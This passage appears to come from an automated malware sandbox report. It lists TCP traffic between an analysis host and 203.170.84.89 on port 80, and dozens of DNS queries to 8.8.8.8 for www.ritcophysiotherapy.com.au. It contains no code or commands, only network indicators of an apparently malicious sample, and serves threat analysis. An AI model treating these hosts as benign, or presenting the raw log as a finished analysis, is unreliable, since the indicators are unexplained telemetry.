                                          Feb 22, 2021 19:14:54.545804024 CET8049856203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:54.545985937 CET4985680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:54.891036987 CET8049856203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:54.924731016 CET8049856203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:54.924935102 CET8049856203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:54.924977064 CET4985680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:54.925045013 CET4985680192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:55.145603895 CET4985780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:55.270009041 CET8049856203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:55.482247114 CET8049857203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:55.482395887 CET4985780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:55.486345053 CET4985780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:55.825571060 CET8049857203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:55.825711966 CET4985780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:56.163249016 CET8049857203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:56.190764904 CET8049857203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:56.190982103 CET4985780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:56.191020966 CET8049857203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:56.191104889 CET4985780192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:56.407243013 CET4985880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:56.527959108 CET8049857203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:56.741144896 CET8049858203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:56.741470098 CET4985880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:56.748662949 CET4985880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:57.082803011 CET8049858203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:57.082882881 CET4985880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:57.416513920 CET8049858203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:57.456227064 CET8049858203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:57.457880974 CET4985880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:57.457911968 CET4985880192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:57.793698072 CET8049858203.170.84.89192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Feb 22, 2021 19:12:46.699098110 CET4971453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:46.757280111 CET53497148.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:47.485116005 CET5802853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:47.533768892 CET53580288.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:48.048538923 CET5309753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:48.110224009 CET53530978.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:48.537398100 CET4925753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:48.586189032 CET53492578.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:49.546427965 CET6238953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:49.600754976 CET53623898.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:50.922528982 CET4991053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:50.971520901 CET53499108.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:52.349210024 CET5585453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:52.400909901 CET53558548.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:53.197659969 CET6454953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:53.249222040 CET53645498.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:54.069267988 CET6315353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:54.118216038 CET53631538.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:54.963105917 CET5299153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:55.012037992 CET53529918.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:55.750237942 CET5370053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:55.801871061 CET53537008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:56.992151976 CET5172653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:57.060209036 CET53517268.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:57.798089027 CET5679453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:57.847174883 CET53567948.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:58.594722033 CET5653453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:58.645100117 CET53565348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:12:59.454663992 CET5662753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:12:59.506560087 CET53566278.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:00.408385038 CET5662153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:00.457483053 CET53566218.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:01.223525047 CET6311653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:01.273691893 CET53631168.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:01.605370045 CET6407853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:01.708600998 CET53640788.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:02.055803061 CET6480153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:02.106054068 CET53648018.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:03.013977051 CET6172153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:03.113802910 CET53617218.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:03.449681044 CET5125553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:03.501132965 CET53512558.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:04.268918991 CET6152253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:04.329303026 CET53615228.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:05.635144949 CET5233753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:05.698806047 CET53523378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:07.006390095 CET5504653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:07.065711021 CET53550468.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:08.984812021 CET4961253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:09.033745050 CET53496128.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:10.312819958 CET4928553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:10.409897089 CET53492858.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:11.686445951 CET5060153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:11.784482002 CET53506018.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:13.049364090 CET6087553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:13.098505974 CET53608758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:14.353496075 CET5644853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:14.410690069 CET53564488.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:15.696485043 CET5917253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:15.753534079 CET53591728.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:17.004920006 CET6242053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:17.062061071 CET53624208.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:18.343101025 CET6057953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:18.400012016 CET53605798.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:19.644253969 CET5018353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:19.701555014 CET53501838.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:19.753859997 CET6153153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:19.802674055 CET53615318.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:20.936100960 CET4922853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:20.985097885 CET53492288.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:22.276679039 CET5979453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:22.325532913 CET53597948.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:23.601208925 CET5591653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:23.659809113 CET53559168.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:24.954325914 CET5275253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:25.014542103 CET53527528.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:26.557146072 CET6054253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:26.614264011 CET53605428.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:27.872664928 CET6068953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:27.933027983 CET53606898.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:29.179162979 CET6420653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:29.239970922 CET53642068.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:30.478329897 CET5090453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:30.543951035 CET53509048.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:31.792977095 CET5752553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:31.841751099 CET53575258.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:33.080705881 CET5381453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:33.143090010 CET53538148.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:34.416704893 CET5341853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:34.473993063 CET53534188.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:35.697698116 CET6283353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:35.749298096 CET53628338.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:36.296514988 CET5926053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:36.380817890 CET53592608.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:36.940398932 CET4994453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:36.975975990 CET6330053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:37.035079956 CET53499448.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:37.036025047 CET53633008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:37.580722094 CET6144953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:37.639991045 CET53614498.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:37.969660044 CET5127553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.034594059 CET53512758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:38.041256905 CET6349253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.098578930 CET53634928.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:38.294977903 CET5894553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.343662024 CET53589458.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:38.579691887 CET6077953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:38.675987959 CET53607798.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:39.268973112 CET6401453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:39.320518970 CET53640148.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:39.589708090 CET5709153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:39.638431072 CET53570918.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:39.894169092 CET5590453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:39.953531027 CET53559048.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:40.592643976 CET5210953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:40.659733057 CET53521098.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:40.767162085 CET5445053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:40.827141047 CET53544508.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:40.908086061 CET4937453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:40.957115889 CET53493748.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:41.681437969 CET5043653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:41.740370035 CET53504368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:42.180453062 CET6260553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:42.241112947 CET5425653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:42.242538929 CET53626058.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:42.303832054 CET53542568.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:43.470884085 CET5218953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:43.532692909 CET53521898.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:44.744219065 CET5613153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:44.793344975 CET53561318.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:46.029913902 CET6299253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:46.095216990 CET53629928.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:47.358259916 CET5443253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:47.418471098 CET53544328.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:48.636250973 CET5722753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:48.698528051 CET53572278.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:49.926906109 CET5838353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:49.976164103 CET53583838.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:51.217977047 CET6313653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:51.275183916 CET53631368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:52.534214973 CET5091153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:52.587490082 CET53509118.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:53.826677084 CET6340953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:53.875464916 CET53634098.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:54.005342960 CET5918553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:54.021559000 CET6423653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:54.057297945 CET53591858.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:54.078851938 CET53642368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:55.097614050 CET5615753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:55.155000925 CET53561578.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:56.374689102 CET5560153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:56.423229933 CET53556018.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:57.165973902 CET5298453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:57.226808071 CET53529848.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:57.636794090 CET5114153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:57.693878889 CET53511418.8.8.8192.168.2.4
                                          Feb 22, 2021 19:13:58.918042898 CET5361053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:13:58.975639105 CET53536108.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:00.227699995 CET6124753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:00.289978027 CET53612478.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:01.510381937 CET6516553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:01.575758934 CET53651658.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:02.839185953 CET5207653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:02.888058901 CET53520768.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:04.114171028 CET5490353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:04.163002968 CET53549038.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:05.420623064 CET5504553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:05.469511986 CET53550458.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:06.720895052 CET5446453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:06.769843102 CET53544648.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:08.022066116 CET5097053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:08.070943117 CET53509708.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:09.293391943 CET5526153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:09.352627993 CET53552618.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:10.585911036 CET5980953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:10.638309002 CET53598098.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:11.897115946 CET5127853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:11.957366943 CET53512788.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:13.196566105 CET5193253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:13.248152971 CET53519328.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:15.029618979 CET5949453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:15.078545094 CET53594948.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:16.292236090 CET5591553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:16.344048023 CET53559158.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:17.598541975 CET4977953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:17.658497095 CET53497798.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:18.904568911 CET4945853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:18.961647034 CET53494588.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:20.202388048 CET5716453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:20.252974033 CET53571648.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:21.463465929 CET4984053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:21.528162003 CET53498408.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:22.777031898 CET5717453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:22.828773975 CET53571748.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:24.085288048 CET5853153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:24.138386965 CET53585318.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:25.337888002 CET4960853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:25.386800051 CET53496088.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:26.620599985 CET5568253192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:26.670846939 CET53556828.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:27.894123077 CET6243653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:27.951292992 CET53624368.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:29.153413057 CET6123053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:29.203366041 CET53612308.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:29.859769106 CET6473053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:29.908608913 CET53647308.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:30.406487942 CET6062453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:30.455286026 CET53606248.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:31.681385040 CET6260053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:31.727921963 CET5320053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:31.749803066 CET53626008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:31.792812109 CET53532008.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:33.020991087 CET6103453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:33.069703102 CET53610348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:34.320353031 CET5768753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:34.368915081 CET53576878.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:35.638341904 CET4983953192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:35.686975956 CET53498398.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:36.937913895 CET5797553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:36.989465952 CET53579758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:38.226160049 CET5761053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:38.275090933 CET53576108.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:39.548564911 CET5513753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:39.597359896 CET53551378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:40.861488104 CET5921653192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:40.910367966 CET53592168.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:42.153589010 CET6349553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:42.204519987 CET53634958.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:43.443846941 CET6437153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:43.493170977 CET53643718.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:44.731411934 CET5403753192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:44.783324003 CET53540378.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:46.037934065 CET5348153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:46.086884975 CET53534818.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:47.326683998 CET5831353192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:47.375808954 CET53583138.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:48.652367115 CET5895053192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:48.703289032 CET53589508.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:49.946625948 CET5501153192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:49.995392084 CET53550118.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:51.218924046 CET5719853192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:51.267704964 CET53571988.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:52.516993046 CET6087553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:52.566010952 CET53608758.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:53.796204090 CET5513453192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:53.844918966 CET53551348.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:55.085910082 CET5369553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:55.140264988 CET53536958.8.8.8192.168.2.4
                                          Feb 22, 2021 19:14:56.344922066 CET5097553192.168.2.48.8.8.8
                                          Feb 22, 2021 19:14:56.395956993 CET53509758.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Feb 22, 2021 19:13:01.605370045 CET192.168.2.48.8.8.80xf2b4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:03.013977051 CET192.168.2.48.8.8.80xc3d2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:04.268918991 CET192.168.2.48.8.8.80xf658Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:05.635144949 CET192.168.2.48.8.8.80xf93eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:07.006390095 CET192.168.2.48.8.8.80xa7f6Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:08.984812021 CET192.168.2.48.8.8.80x3a63Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:10.312819958 CET192.168.2.48.8.8.80xddf9Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:11.686445951 CET192.168.2.48.8.8.80x96c5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:13.049364090 CET192.168.2.48.8.8.80x7723Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:14.353496075 CET192.168.2.48.8.8.80xfb83Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:15.696485043 CET192.168.2.48.8.8.80x4299Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:17.004920006 CET192.168.2.48.8.8.80xdb49Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:18.343101025 CET192.168.2.48.8.8.80x177cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:19.644253969 CET192.168.2.48.8.8.80xbe65Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:20.936100960 CET192.168.2.48.8.8.80x7c9dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:22.276679039 CET192.168.2.48.8.8.80x8e2aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:23.601208925 CET192.168.2.48.8.8.80x4b1cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:24.954325914 CET192.168.2.48.8.8.80x9f7Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:26.557146072 CET192.168.2.48.8.8.80x8dcaStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:27.872664928 CET192.168.2.48.8.8.80xe56cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:29.179162979 CET192.168.2.48.8.8.80xd2aeStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:30.478329897 CET192.168.2.48.8.8.80x5c1dStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:31.792977095 CET192.168.2.48.8.8.80x73e3Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:33.080705881 CET192.168.2.48.8.8.80xa1caStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:34.416704893 CET192.168.2.48.8.8.80xc977Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:35.697698116 CET192.168.2.48.8.8.80x43e1Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:36.975975990 CET192.168.2.48.8.8.80x5256Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:38.294977903 CET192.168.2.48.8.8.80xba7cStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:39.589708090 CET192.168.2.48.8.8.80x6371Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:40.908086061 CET192.168.2.48.8.8.80x8eb6Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:42.180453062 CET192.168.2.48.8.8.80x3351Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:43.470884085 CET192.168.2.48.8.8.80x40f2Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:44.744219065 CET192.168.2.48.8.8.80xb103Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:46.029913902 CET192.168.2.48.8.8.80x15f5Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:47.358259916 CET192.168.2.48.8.8.80xe9f4Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:48.636250973 CET192.168.2.48.8.8.80x8755Standard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:49.926906109 CET192.168.2.48.8.8.80xa2eStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
                                          Feb 22, 2021 19:13:51.217977047 CET192.168.2.48.8.8.80xb66aStandard query (0)www.ritcophysiotherapy.com.auA (IP address)IN (0x0001)
